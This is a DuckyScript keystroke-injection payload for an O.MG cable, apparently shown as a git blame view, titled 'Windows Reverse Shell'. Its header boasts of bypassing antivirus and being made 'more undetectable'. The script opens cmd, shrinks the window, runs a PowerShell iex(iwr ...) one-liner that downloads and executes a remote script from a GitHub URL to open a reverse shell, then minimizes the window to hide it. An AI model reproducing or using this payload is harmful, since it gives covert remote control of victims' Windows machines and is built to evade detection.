2021-10-14 00:28:15 +00:00
|
|
|
REM #############################################################################################################
|
2021-10-14 16:59:23 +00:00
|
|
|
REM # Title: Windows Reverse Shell #
|
|
|
|
REM # Description: This script is designed to get a reverse shell in Windows enviroments #
|
2021-10-14 00:28:15 +00:00
|
|
|
REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. #
|
|
|
|
REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. #
|
|
|
|
REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more #
|
|
|
|
REM # undetectable. #
|
2021-10-14 16:59:23 +00:00
|
|
|
REM # Author: Hug1n #
|
2021-10-14 00:28:15 +00:00
|
|
|
REM #############################################################################################################
|
|
|
|
|
2021-10-14 16:59:23 +00:00
|
|
|
REM @@ Opening the CMD
|
2021-10-14 00:28:15 +00:00
|
|
|
GUI r
|
|
|
|
DELAY 500
|
|
|
|
STRING cmd.exe
|
|
|
|
ENTER
|
|
|
|
DELAY 200
|
2021-10-14 16:59:23 +00:00
|
|
|
REM @@ Changing the color, risizing the CMD and executing the reverse shell in memory
|
2022-02-28 02:59:54 +00:00
|
|
|
STRING cmd /C color FE&mode con:cols=18 lines=1&powershell "iex(iwr raw.githubusercontent.com/Hug1n/reverse_shells/main/minrev.ps1)"
|
2021-10-14 00:28:15 +00:00
|
|
|
DELAY 200
|
|
|
|
ENTER
|
2021-10-14 16:59:23 +00:00
|
|
|
REM @@ Minimizing the CMD
|
2021-10-14 00:28:15 +00:00
|
|
|
ALT SPACE
|
2021-10-14 16:59:23 +00:00
|
|
|
DOWN
|
|
|
|
DOWN
|
|
|
|
DOWN
|
2021-10-14 00:28:15 +00:00
|
|
|
ENTER
|